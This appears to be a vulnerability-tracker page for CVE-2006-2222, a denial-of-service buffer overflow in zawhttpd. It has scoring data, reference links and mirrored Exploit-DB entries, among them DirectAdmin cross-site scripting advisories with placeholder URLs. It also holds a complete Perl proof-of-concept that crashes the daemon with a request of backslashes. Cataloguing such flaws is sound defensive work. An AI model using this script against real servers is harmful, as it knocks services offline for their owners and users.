CVE-2006-2222
published 2006-05-05CVE-2006-2222: Buffer overflow in zawhttpd 0.8.23, and possibly previous versions, allows remote attackers to cause a denial of service (daemon crash) via a request for a URI…
PriorityP423medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
4.00%
89.2th percentile
Buffer overflow in zawhttpd 0.8.23, and possibly previous versions, allows remote attackers to cause a denial of service (daemon crash) via a request for a URI composed of several "\" (backslash) characters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| norz | zawhttpd | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DirectAdmin 1.28/1.29 - 'CMD_EMAIL_LIST' Cross-Site Scripting
exploitdb·2006-11-12
CVE-2006-5983 DirectAdmin 1.28/1.29 - 'CMD_EMAIL_LIST' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_EMAIL_LIST' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21049/info
DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions 1.28.1 and 2.29 are vulnerable; other versions may also be affected.
http://www.example.com:2222/CMD_EMAIL_LIST?action=view&DOMAIN=demo.com&name=XSS
Exploit-DB
DirectAdmin 1.28/1.29 - 'CMD_SHOW_USER' Cross-Site Scripting
exploitdb·2006-11-12
CVE-2006-5983 DirectAdmin 1.28/1.29 - 'CMD_SHOW_USER' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_SHOW_USER' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21049/info
DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions 1.28.1 and 2.29 are vulnerable; other versions may also be affected.
http://www.example.com:2222/CMD_SHOW_USER?user=XSS
Exploit-DB
DirectAdmin 1.28/1.29 - 'CMD_FTP_SHOW' Cross-Site Scripting
exploitdb·2006-11-12
CVE-2006-5983 DirectAdmin 1.28/1.29 - 'CMD_FTP_SHOW' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_FTP_SHOW' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21049/info
DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions 1.28.1 and 2.29 are vulnerable; other versions may also be affected.
http://www.example.com:2222/CMD_FTP_SHOW?DOMAIN=demo.com&user=XSS
Exploit-DB
DirectAdmin 1.28/1.29 - 'CMD_EMAIL_FORWARDER_MODIFY' Cross-Site Scripting
exploitdb·2006-11-12
CVE-2006-5983 DirectAdmin 1.28/1.29 - 'CMD_EMAIL_FORWARDER_MODIFY' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_EMAIL_FORWARDER_MODIFY' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21049/info
DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions 1.28.1 and 2.29 are vulnerable; other versions may also be affected.
http://www.example.com:2222/CMD_EMAIL_FORWARDER_MODIFY?DOMAIN=demo.com&user=XSS
Exploit-DB
DirectAdmin 1.28/1.29 - 'CMD_SHOW_RESELLER' Cross-Site Scripting
exploitdb·2006-11-12
CVE-2006-5983 DirectAdmin 1.28/1.29 - 'CMD_SHOW_RESELLER' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_SHOW_RESELLER' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21049/info
DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions 1.28.1 and 2.29 are vulnerable; other versions may also be affected.
http://www.example.com:2222/CMD_SHOW_RESELLER?userXSS
Exploit-DB
DirectAdmin 1.28/1.29 - 'CMD_TICKET_CREATE' Cross-Site Scripting
exploitdb·2006-11-12
CVE-2006-5983 DirectAdmin 1.28/1.29 - 'CMD_TICKET_CREATE' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_TICKET_CREATE' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21049/info
DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions 1.28.1 and 2.29 are vulnerable; other versions may also be affected.
http://www.example.com:2222/CMD_TICKET_CREATE?TYPE=XSS
Exploit-DB
DirectAdmin 1.28/1.29 - 'CMD_EMAIL_VACATION_MODIFY' Cross-Site Scripting
exploitdb·2006-11-12
CVE-2006-5983 DirectAdmin 1.28/1.29 - 'CMD_EMAIL_VACATION_MODIFY' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_EMAIL_VACATION_MODIFY' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21049/info
DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions 1.28.1 and 2.29 are vulnerable; other versions may also be affected.
http://www.example.com:2222/CMD_EMAIL_VACATION_MODIFY?DOMAIN=demo.com&user=XSS
Exploit-DB
DirectAdmin 1.28/1.29 - 'CMD_TICKET' Cross-Site Scripting
exploitdb·2006-11-12
CVE-2006-5983 DirectAdmin 1.28/1.29 - 'CMD_TICKET' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_TICKET' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21049/info
DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions 1.28.1 and 2.29 are vulnerable; other versions may also be affected.
http://www.example.com:2222/CMD_TICKET?action=view&number=000000044&type=XSS
Exploit-DB
zawhttpd 0.8.23 - GET Remote Buffer Overflow (Denial of Service) (PoC)
exploitdb·2006-05-04
CVE-2006-2222 zawhttpd 0.8.23 - GET Remote Buffer Overflow (Denial of Service) (PoC)
zawhttpd 0.8.23 - GET Remote Buffer Overflow (Denial of Service) (PoC)
---
#!/usr/bin/perl
# zawhttpd Buffer Overflow Exploit
# by Kamil 'K3' Sienicki
use IO::Socket;
use strict;
my($socket) = "";
if($socket = IO::Socket::INET->new(
PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
{
print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ...";
print $socket "GET \\\\\\\\\\\\\\\\\\\\ HTTP/1.0\r\n\r\n";
close($socket);
}
else
{
print "perl zawhttpd.pl localhost 80 \n";
print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
}
#EoF
# milw0rm.com [2006-05-04]
No writeups or analysis indexed.
http://securityreason.com/securityalert/852http://securitytracker.com/id?1016030http://www.osvdb.org/25671http://www.securiteam.com/exploits/5OP0315IKK.htmlhttp://www.securityfocus.com/archive/1/432955/100/0/threadedhttp://www.securityfocus.com/bid/17814https://exchange.xforce.ibmcloud.com/vulnerabilities/26257http://securityreason.com/securityalert/852http://securitytracker.com/id?1016030http://www.osvdb.org/25671http://www.securiteam.com/exploits/5OP0315IKK.htmlhttp://www.securityfocus.com/archive/1/432955/100/0/threadedhttp://www.securityfocus.com/bid/17814https://exchange.xforce.ibmcloud.com/vulnerabilities/26257
2006-05-05
Published